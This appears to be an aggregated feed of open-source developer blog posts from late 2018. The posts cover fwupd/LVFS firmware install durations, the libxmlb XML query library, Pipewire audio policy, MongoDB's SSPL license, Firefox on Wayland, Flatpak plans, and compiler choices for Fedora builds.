Update 2: I forgot to mention that GApplication has also gained a name-lost signal. It can be used to save state in the old instance that can then be loaded in the new instance.

Adding an optional install duration to LVFS firmware

Posted by Richard Hughes on November 13, 2018 09:54 AM

We’ve just added an optional feature to fwupd and the LVFS that some people might find useful: The firmware update process can now tell the user how long in seconds the update is going to take.

This means that users can know that a dock update might take 5 minutes, and so they start the update process before they go to lunch. A UEFI update will require multiple reboots and will take 45 minutes to apply, and so the user will only apply the update at the end of the day rather than losing access to the their computer for nearly an hour.

If you want to use this feature there are currently three ways to assign the duration to the update:

  • Changing the value on the LVFS admin console — the component update panel now has an extra input field to enter the
    duration in
    seconds
  • Adding a new attribute to the element, for instance:
    <release version="3.0.2" date="2018-11-09" install_duration="120">
    
  • Adding a ‘quirk’ to fwupd, for instance:
    [DeviceInstanceId=USB\VID_1234&PID_5678]
    InstallDuration = 40
    
  • For updates requiring a reboot the install duration should include the time to POST the system both before and after the update has run, but it can be approximate. Only users running very new versions of fwupd and gnome-software will be shown the install duration, and older versions will be unchanged as the new property will just be ignored. It’s therefore safe to include in all versions of firmware without adding a the dependency on a specific fwupd version.

More fun with libxmlb

Posted by Richard Hughes on November 12, 2018 03:49 PM

A few days ago I cut the 0.1.4 release of libxmlb, which is significant because it includes the last three features I needed in gnome-software to achieve the same search results as appstream-glib.

The first is something most users of database libraries will be familiar with: Bound variables. The idea is you prepare a query which is parsed into opcodes, and then at a later time you assign one of the ? opcode values to an actual integer or string. This is much faster as you do not have to re-parse the predicate, and also means you avoid failing in incomprehensible ways if the user searches for nonsense like ]@attr. Borrowing from SQL, the syntax should be familiar:

g_autoptr(XbQuery) query = xb_query_new (silo, "components/component/id[text()=?]/..", &error);
xb_query_bind_str (query, 0, "gimp.desktop", &error);

The second feature makes the caller jump through some hoops, but hoops that make things faster: Indexed queries. As it might be apparent to some, libxmlb stores all the text in a big deduplicated string table after the tree structure is defined. That means if you do <component component="component">component</component> then we only store just one string! When we actually set up an object to check a specific node for a predicate (for instance, text()='fubar' we actually do strcmp("fubar", "component") internally, which in most cases is very fast…

Unless you do it 10 million times…

Using indexed strings tells the XbMachine processing the predicate to first check if fubar exists in the string table, and if it doesn’t, the predicate can’t possibly match and is skipped. If it does exist, we know the integer position in the string table, and so when we compare the strings we can just check two uint32_t’s which is quite a lot faster, especially on ARM for some reason. In the case of fwupd, it is searching for a specific GUID when returning hardware results. Using an indexed query takes the per-device query time from 3.17ms to about 0.33ms – which if you have a large number of connected updatable devices makes a big difference to the user experience. As using the indexed queries can have a negative impact and requires extra code it is probably only useful in a handful of cases. In case you do need this feature, this is the code you would use:

xb_silo_query_build_index (silo, "component/id", NULL, &error); // the cdata
xb_silo_query_build_index (silo, "component", "type", &error); // the @type attr
g_autoptr(XbNode) n = xb_silo_query_first (silo, "component/id[text()=$'test.firmware']", &error);

The indexing being denoted by $'' rather than the normal pair of single quotes. If there is something more standard to denote this kind of thing, please let me know and I’ll switch to that instead.

The third feature is: Stemming; which means you can search for “gaming mouse” and still get results that mention games, game and Gaming. This is also how you can search for words like Kongreßstraße which matches kongressstrasse. In an ideal world stemming would be computationally free, but if we are comparing millions of records each call to libstemmer sure adds up. Adding the stem() XPath operator took a few minutes, but making it usable took up a whole weekend.

The query we wanted to run would be of the form id[text()~=stem('?') but the stem() would be called millions of times on the very same string for each comparison. To fix this, and to make other XPath operators faster I implemented an opcode rewriting optimisation pass to the XbMachine parser. This means if you call lower-case(text())==lower-case('GIMP.DESKTOP') we only call the UTF-8 strlower function N+1 times, rather than 2N times. For lower-case() the performance increase is slight, but for stem it actually makes the feature usable in gnome-software. The opcode rewriting optimisation pass is kinda dumb in how it works (“lets try all combinations!”), but works with all of the registered methods, and makes all existing queries faster for almost free.

One common question I’ve had is if libxmlb is supposed to obsolete appstream-glib, and the answer is “it depends”. If you’re creating or building AppStream metadata, or performing any AppStream-specific validation then stick to the appstream-glib or appstream-builder libraries. If you just want to read AppStream metadata you can use either, but if you can stomach a binary blob of rewritten metadata stored somewhere, libxmlb is going to be a couple of orders of magnitude faster and use a ton less memory.

If you’re thinking of using libxmlb in your project send me an email and I’m happy to add more documentation where required. At the moment libxmlb does everything I need for fwupd and gnome-software and so apart from bugfixes I think it’s basically “done”, which should make my manager somewhat happier. Comments welcome.

Pipewire Hackfest 2018

Posted by Bastien Nocera on October 31, 2018 11:44 AM
Good morning from Edinburgh, where the breakfast contains haggis, and the charity shops have some interesting finds.

My main goal in attending this hackfest was to discuss Pipewire integration in the desktop, and how it will eventually replace PulseAudio as the audio daemon.

The main problem GNOME has had over the years with PulseAudio relate mostly to how PulseAudio was a black box when it came to its routing policy. What happens when you plug in an HDMI cable into your laptop? Or turn on your Bluetooth headset? I've heard the stories of folks with highly mobile workstations having to constantly visit the Sound settings panel.

PulseAudio has policy scattered in a number of places (do a "git grep routing" inside the sources to see that): some are in the device manager, then modules themselves can set priorities for their outputs and inputs. But there's nothing to take all the information in, and take a decision based on the hardware that's plugged in, and the applications currently in use.

For Pipewire, the policy decisions would be split off from the main daemon. Pipewire, as it gains PulseAudio compatibility layers, will grow a default/example policy engine that will try to replicate PulseAudio's behaviour. At the very least, that will mean that Pipewire won't regress compared to PulseAudio, and might even be able to take better decisions in the short term.

For GNOME, we still wanted to take control of that part of the experience, and make our own policy decisions. It's very possible that this engine will end up being featureful and generic enough that it will be used by more than just GNOME, or even become the default Pipewire one, but it's far too early to make that particular decision.

In the meanwhile, we wanted the GNOME policies to not be written in C, difficult to experiment with for power users, and for edge use cases. We could have started writing a configuration language, but it would have been too specific, and there are plenty of embeddable languages around. It was also a good opportunity for me to finally write the helper library I've been meaning to write for years, based on my favourite embedded language, Lua.

So I'm introducing Anatole. The goal of the project is to make it trivial to write chunks of programs in Lua, while the core of your project is written in C (we might even be able to embed it in Python or Javascript, once introspection support is added).

It's still in the very early days, and unusable for anything as of yet, but progress should be pretty swift. The code is mostly based on Victor Toso's incredible "Lua factory" plugin in Grilo. (I'm hoping that, once finished, I won't have to remember on which end of the stack I need to push stuff for Lua to do something with it ;)

Using the LVFS to influence procurement decisions

Posted by Richard Hughes on October 30, 2018 12:41 PM

The National Cyber Security Centre (part of GCHQ, the UK version of the NSA) wrote a nice article on using the LVFS to influence procurement decisions. It’s probably also worth noting that the two biggest OEMs making consumer hardware also require all their ODMs to also support firmware updates on the LVFS. More and more mega-corporations also have “supports the LVFS” as a requirement for procurement.

The LVFS is slowly and carefully moving to the Linux Foundation, so expect more outreach and announcements soon.

libxmlb now a dependency of fwupd and gnome-software

Posted by Richard Hughes on October 22, 2018 07:31 AM

I’ve just released libxmlb 0.1.3, and merged the branches for fwupd and gnome-software so that it becomes a hard dependency on both projects. A few people have reviewed the libxmlb code, and Mario, Kalev and Robert reviewed the fwupd and gnome-software changes so I’m pretty confident I’ve not broken anything too important — but more testing very welcome. GNOME Software RSS usage is about 50% of what is shipped in 3.30.x and fwupd is down by 65%! If you want to ship the upcoming fwupd 1.2.0 or gnome-software 3.31.2 in your distro you’ll need to have libxmlb packaged, or be happy using a meson subpackage to download libxmlb during the build of each dependent project.

Initial thoughts on MongoDB's new Server Side Public License

Posted by Matthew Garrett on October 16, 2018 10:43 PM
MongoDB just announced that they were relicensing under their new Server Side Public License. This is basically the Affero GPL except with section 13 largely replaced with new text, as follows:

If you make the functionality of the Program or a modified version available to third parties as a service, you must make the Service Source Code available via network download to everyone at no charge, under the terms of this License. Making the functionality of the Program or modified version available to third parties as a service includes, without limitation, enabling third parties to interact with the functionality of the Program or modified version remotely through a computer network, offering a service the value of which entirely or primarily derives from the value of the Program or modified version, or offering a service that accomplishes for users the primary purpose of the Software or modified version.

“Service Source Code” means the Corresponding Source for the Program or the modified version, and the Corresponding Source for all programs that you use to make the Program or modified version available as a service, including, without limitation, management software, user interfaces, application program interfaces, automation software, monitoring software, backup software, storage software and hosting software, all such that a user could run an instance of the service using the Service Source Code you make available.


MongoDB admit that this license is not currently open source in the sense of being approved by the Open Source Initiative, but say:We believe that the SSPL meets the standards for an open source license and are working to have it approved by the OSI.

At the broadest level, AGPL requires you to distribute the source code to the AGPLed work[1] while the SSPL requires you to distribute the source code to everything involved in providing the service. Having a license place requirements around things that aren't derived works of the covered code is unusual but not entirely unheard of - the GPL requires you to provide build scripts even if they're not strictly derived works, and you could probably make an argument that the anti-Tivoisation provisions of GPL3 fall into this category.

A stranger point is that you're required to provide all of this under the terms of the SSPL. If you have any code in your stack that can't be released under those terms then it's literally impossible for you to comply with this license. I'm not a lawyer, so I'll leave it up to them to figure out whether this means you're now only allowed to deploy MongoDB on BSD because the license would require you to relicense Linux away from the GPL. This feels sloppy rather than deliberate, but if it is deliberate then it's a massively greater reach than any existing copyleft license.

You can definitely make arguments that this is just a maximalist copyleft license, the AGPL taken to extreme, and therefore it fits the open source criteria. But there's a point where something is so far from the previously accepted scenarios that it's actually something different, and should be examined as a new category rather than already approved categories. I suspect that this license has been written to conform to a strict reading of the Open Source Definition, and that any attempt by OSI to declare it as not being open source will receive pushback. But definitions don't exist to be weaponised against the communities that they seek to protect, and a license that has overly onerous terms should be rejected even if that means changing the definition.

In general I am strongly in favour of licenses ensuring that users have the freedom to take advantage of modifications that people have made to free software, and I'm a fan of the AGPL. But my initial feeling is that this license is a deliberate attempt to make it practically impossible to take advantage of the freedoms that the license nominally grants, and this impression is strengthened by it being something that's been announced with immediate effect rather than something that's been developed with community input. I think there's a bunch of worthwhile discussion to have about whether the AGPL is strong and clear enough to achieve its goals, but I don't think that this SSPL is the answer to that - and I lean towards thinking that it's not a good faith attempt to produce a usable open source license.

(It should go without saying that this is my personal opinion as a member of the free software community, and not that of my employer)

[1] There's some complexities around GPL3 code that's incorporated into the AGPLed work, but if it's not part of the AGPLed work then it's not covered

comment count unavailable comments

Firefox on Wayland update

Posted by Martin Stransky on October 09, 2018 09:38 AM

As a next step in the Wayland effort we have new fresh Firefox packages [1] with all the goodies from Firefox 63/64 (Nightly) for you. They come with better (and fixed) rendering, v-sync support, and working HiDPI. Support for hi-res displays is not perfect yet and more fixes are on the way – thanks to Jan Horak who wrote that patches.

The builds also ship PipeWire WebRTC patch for desktop sharing created by Jan Grulich and Tomas Popela. Wayland applications are isolated from desktop and don’t have access to other windows (as X11) thus PipeWire supplies the missing functionality along the browser sandbox.

I think the rendering is generally covered now and the browser should work smoothly with Wayland backend. That’s also a reason why I make it default on Fedora 30 (Rawhide) and firefox-x11 package is available as a X11 fallback. Fedora 29 and earlier stay with default X11 backend and Wayland is provided by firefox-wayland package.

And there’s surely some work left to make Firefox perfect on Wayland – for instance correctly place popups on Gtk 3.24, update WebRender/EGL, fix KDE compositor and so on.

[1] Fedora 27 Fedora 28 Fedora 29

Flatpak, after 1.0

Posted by Matthias Clasen on October 08, 2018 05:45 PM

Flatpak 1.0 has happened a while ago, and we now have a stable base. We’re up to the 1.0.3 bug-fix release at this point, and hope to get 1.0.x adopted in all major distros before too long.

Does that mean that Flatpak is done ? Far from it! We have just created a stable branch and started landing some queued-up feature work on the master branch. This includes things like:

  • Better life-cycle control with ps and kill commands
  • Logging and history
  • File copy-paste and DND
  • A better testsuite, including coverage reports

Beyond these, we have a laundry list of things we want to work on in the near future, including

  • Using  host GL drivers (possibly with libcapsule)
  • Application renaming and end-of-life migration
  • A portal for dconf/gsettings (a stopgap measure until we have D-Bus container support)
  • A portal for webcam access
  • More tests!

We are also looking at improving the scalability of the flathub infrastructure. The repository has grown to more than 400 apps, and buildbot is not really meant for using it the way we do.

What about releases?

We have not set a strict schedule, but the consensus seems to be that we are aiming for roughly quarterly releases, with more frequent devel snapshots as needed. Looking at the calendar, that would mean we should expect a stable 1.2 release around the end of the year.

Open for contribution

One of the easiest ways to help Flatpak is to get your favorite applications on flathub, either by packaging it yourself, or by convincing the upstream to do it.

If you feel like contributing to Flatpak itself,  please do! Flatpak is still a young project, and there are plenty of small to medium-size features that can be added. The tests are also a nice place to stick your toe in and see if you can improve the coverage a bit and maybe find a bug or two.

Or, if that is more your thing, we have a nice design for improving the flatpak commandline user experience that is waiting to be implemented.

Announcing the first release of libxmlb

Posted by Richard Hughes on October 04, 2018 06:36 PM

Today I did the first 0.1.0 preview release of libxmlb. We’re at the “probably API stable, but no promises” stage. This is the library I introduced a couple of weeks ago, and since then I’ve been porting both fwupd and gnome-software to use it. The former is almost complete, and nearly ready to merge, but the latter is still work in progress with a fair bit of code to write. I did manage to launch gnome-software with libxmlb yesterday, and modulo a bit of brokenness it’s both faster to start (over 800ms faster from cold boot!) and uses an amazing 90Mb less RSS at runtime. I’m planning to merge the libxmlb branch into the unstable branch of fwupd in the next few weeks, so I need volunteers to package up the new hard dep for Debian, Ubuntu and Arch.

The tarball is in the usual place – it’s a simple Meson-built library that doesn’t do anything crazy. I’ve imported and built it already for Fedora, much thanks to Kalev for the super speedy package review.

I guess I should explain how applications are expected to use this library. At its core, there are just five different kinds of objects you need to care about:

  • XbSilo – a deduplicated string pool and a read only node tree. This is typically kept alive for the application lifetime.
  • XbNode – a “Gobject wrapped” immutable node available as a query result from XbSilo.
  • XbBuilder – a “compiler” to build the XbSilo from XbBuilderNode’s or XbBuilderSource’s. This is typically created and destroyed at startup or when the blob needs regenerating.
  • XbBuilderNode – a mutable node that can have a parent, children, attributes and a value
  • XbBuilderSource – a source of data for XbBuilder, e.g. a .xml.gz file or just a raw XML string

The way most applications will use libxmlb is to create a local XbBuilder instance, add some XbBuilderSource’s and then “ensure” a local cache file. The “ensure” process either mmap loads the binary blob if all the file mtimes are the same, or compiles a blob saving it to a new file. You can also tell the XbSilo to watch all the sources that it was built with, so that if any files change at runtime the valid property gets set to FALSE and the application can xb_builder_ensure() at a convenient time.

Once the XbBuilder has been compiled, a XbSilo pops out. With the XbSilo you can query using most common XPath statements – I actually ended up implementing a FORTH-style stack interpreter so we can now do queries like /components/component/id[contains(upper-case(text()),'GIMP')] – I’ll say a bit more on that in a minute. Queries can limit the number of results (for speed), and are deduplicated in a sane way so it’s really quite a simple process to achieve something that would be a lot of C code. It’s possible to directly query an attribute or text value from a node, so the silo doesn’t have to be passed around either.

In the process of porting gnome-software, I had to make libxmlb thread-safe – which required some internal organisation. We now have an non-exported XbMachine stack interpreter, and then the XbSilo actually registers the XML-specific methods (like contains()) and functions (like ~=). These get passed some per-method user data, and also some per-query private data that is shared with the node tree – allowing things like [last()] and position()=3 to work. The function callbacks just get passed an query-specific stack, which means you can allow things like comparing “1” to 1.00f This makes it easy to support more of XPath in the future, or to support something completely application specific like gnome-software-search() without editing the library.

If anyone wants to do any API or code review I’d be super happy to answer any questions. Coverity and valgrind seem happy enough with all the self tests, but that’s no replacement for a human asking tricky questions. Thanks!

Speeding up AppStream: mmap’ing XML using libxmlb

Posted by Richard Hughes on September 20, 2018 09:27 AM

AppStream and the related AppData are XML formats that have been adopted by thousands of upstream projects and are being used in about a dozen different client programs. The AppStream metadata shipped in Fedora is currently a huge 13Mb XML file, which with gzip compresses down to a more reasonable 3.6Mb. AppStream is awesome; it provides translations of lots of useful data into basically all languages and includes screenshots for almost everything. GNOME Software is built around AppStream, and we even use a slightly extended version of the same XML format to ship firmware update metadata from the LVFS to fwupd.

XML does have two giant weaknesses. The first is that you have to decompress and then parse the files – which might include all the ~300 tiny AppData files as well as the distro-provided AppStream files, if you want to list installed applications not provided by the distro. Seeking lots of small files isn’t so slow on a SSD, and loading+decompressing a small file is actually quicker than loading an uncompressed larger file. Parsing an XML file typically means you set up some callbacks, which then get called for every start tag, text section, then end tag – so for a 13Mb XML document that’s nested very deeply you have to do a lot of callbacks. This means you have to process the description of GIMP in every language before you can even see if Shotwell exists at all.

The typical way parsing XML involves creating a “node tree” when parsing the XML. This allows you treat the XML document as a Document Object Model (DOM) which allows you to navigate the tree and parse the contents in an object oriented way. This means you typically allocate on the heap the nodes themselves, plus copies of all the string data. AsNode in libappstream-glib has a few tricks to reduce RSS usage after parsing, which includes:

  • Interning common element names like description, p, ul, li
  • Freeing all the nodes, but retaining all the node data
  • Ignoring node data for languages you don’t understand
  • Reference counting the strings from the nodes into the various appstream-glib GObjects

This still has a both drawbacks; we need to store in hot memory all the screenshot URLs of all the apps you’re never going to search for, and we also need to parse all these long translated descriptions data just to find out if gimp.desktop is actually installable. Deduplicating strings at runtime takes nontrivial amounts of CPU and means we build a huge hash table that uses nearly as much RSS as we save by deduplicating.

On a modern system, parsing ~300 files takes less than a second, and the total RSS is only a few tens of Mb – which is fine, right? Except on resource constrained machines it takes 20+ seconds to start, and 40Mb is nearly 10% of the total memory available on the system. We have exactly the same problem with fwupd, where we get one giant file from the LVFS, all of which gets stored in RSS even though you never have the hardware that it matches against. Slow starting of fwupd and gnome-software is one of the reasons they stay resident, and don’t shutdown on idle and restart when required.

We can do better.

We do need to keep the source format, but that doesn’t mean we can’t create a managed cache to do some clever things. Traditionally I’ve been quite vocal against squashing structured XML data into databases like sqlite and Xapian as it’s like pushing a square peg into a round hole, and forces you to think like a database doing 10 level nested joins to query some simple thing. What we want to use is something like XPath, where you can query data using the XML structure itself.

We also want to be able to navigate the XML document as if it was a DOM, i.e. be able to jump from one node to it’s sibling without parsing all the great, great, great, grandchild nodes to get there. This means storing the offset to the sibling in a binary file.

If we’re creating a cache, we might as well do the string deduplication at creation time once, rather than every time we load the data. This has the added benefit in that we’re converting the string data from variable length strings that you compare using strcmp() to quarks that you can compare just by checking two integers. This is much faster, as any SAT solver will tell you. If we’re storing a string table, we can also store the NUL byte. This seems wasteful at first, but has one huge advantage – you can mmap() the string table. In fact, you can mmap the entire cache. If you order the string table in a sensible way then you store all the related data in one block (e.g. the <id> values) so that you don’t jump all over the cache invalidating almost everything just for a common query. mmap’ing the strings means you can avoid strdup()ing every string just in case; in the case of memory pressure the kernel automatically reclaims the memory, and the next time automatically loads it from disk as required. It’s almost magic.

I’ve spent the last few days prototyping a library, which is called libxmlb until someone comes up with a better name. I’ve got a test branch of fwupd that I’ve ported from libappstream-glib and I’m happy to say that RSS has reduced from 3Mb (peak 3.61Mb) to 1Mb (peak 1.07Mb) and the startup time has gone from 280ms to 250ms. Unless I’ve missed something drastic I’m going to port gnome-software too, and will expect even bigger savings as the amount of XML is two orders of magnitude larger.

So, how do I use this thing. First, lets create a baseline doing things the old way:

$ time appstream-util search gimp.desktop
real	0m0.645s
user	0m0.800s
sys	0m0.184s

To create a binary cache:

$ time xb-tool compile appstream.xmlb /usr/share/app-info/xmls/* /usr/share/appdata/* /usr/share/metainfo/*
real	0m0.497s
user	0m0.453s
sys	0m0.028s

$ time xb-tool compile appstream.xmlb /usr/share/app-info/xmls/* /usr/share/appdata/* /usr/share/metainfo/*
real	0m0.016s
user	0m0.004s
sys	0m0.006s

Notice the second time it compiled nearly instantly, as none of the filename or modification timestamps of the sources changed. This is exactly what programs would do every time they are launched.

$ df -h appstream.xmlb
4.2M	appstream.xmlb

$ time xb-tool query appstream.xmlb "components/component[@type='desktop']/id[text()='firefox.desktop']"
RESULT: <id>firefox.desktop</id>
RESULT: <id>firefox.desktop</id>
RESULT: <id>firefox.desktop</id>
real	0m0.008s
user	0m0.007s
sys	0m0.002s

8ms includes the time to load the file, search for all the components that match the query and the time to export the XML. You get three results as there’s one AppData file, one entry in the distro AppStream, and an extra one shipped by Fedora to make Firefox featured in gnome-software. You can see the whole XML component of each result by appending /.. to the query. Unlike appstream-glib, libxmlb doesn’t try to merge components – which makes it much less magic, and a whole lot simpler.

Some questions answered:

  • Why not just use a GVariant blob?: I did initially, and the cache was huge. The deeply nested structure was packed inefficiently as you have to assume everything is a hash table of a{sv}. It was also slow to load; not much faster than just parsing the XML. It also wasn’t possible to implement the zero-copy XPath queries this way.
  • Is this API and ABI stable?: Not yet, as soon as gnome-software is ported.
  • You implemented XPath in c‽: No, only a tiny subset. See the README.md

Comments welcome.

Thunderbird 60 with title bar hidden

Posted by Martin Stransky on September 18, 2018 08:58 AM

Many users like hidden system titlebar as Firefox feature although it’s not finished yet. But we’re very close and I hope to have Firefox 64 in shape that the title bar can be disabled by default at least on Gnome and matches Firefox outfit at Windows and Mac.

Thunderbird 60 was finally released for Fedora and comes with a basic version of the feature as it was introduced at Firefox 60 ESR. There’s a simple checkbox at “Customize” page at Firefox but Thunderbird is missing an easy switch.

To disable the title bar at Thunderbird 60, you need to go to system menu Edit -> Preferences and choose Advanced tab. Then click at Config Editor at page left bottom corner, open it and look for mail.tabs.drawInTitlebar. Double clik on it and your bird should be titleless 🙂

Fedora Firefox – GCC/CLANG dilemma

Posted by Martin Stransky on September 17, 2018 09:00 PM

After reading Mike’s blog post about official Mozilla Firefox switch to LLVM Clang, I was wondering if we should also use that setup for official Fedora Firefox binaries.

The numbers look strong but as Honza Hubicka mentioned, Mozilla uses pretty ancient GCC6 to create binaries and it’s not very fair to compare it with up-to date LLVM Clang 6.

Also if I’m reading the mozilla bug correctly the PGO/LTO is not yet enabled for Linux, only plain optimized builds are used for now…which means the transition at Mozilla is not so far than I expected.

I also went through some Poronix tests which indicates there’s no black and white situation there although Mike claimed that LLVM Clang is generally better that GCC. But it’s possible that Firefox codebase somehow fits better LLVM Clang than GCC.

After some consideration I think we’ll stay with GCC for now and I’m going compare Fedora GCC 8 builds with the Mozilla  LLVM Clang ones when there are available. Both builds can’t use -march=native so It may be an equal comparsion. Also Fedora should enable the PGO+LTO GCC setup to get the best from GCC.

[Update] I was wrong and PGO+LTO should be enabled also for Linux builds now. The numbers looks very well and I wonder if we can match them with GCC8! 🙂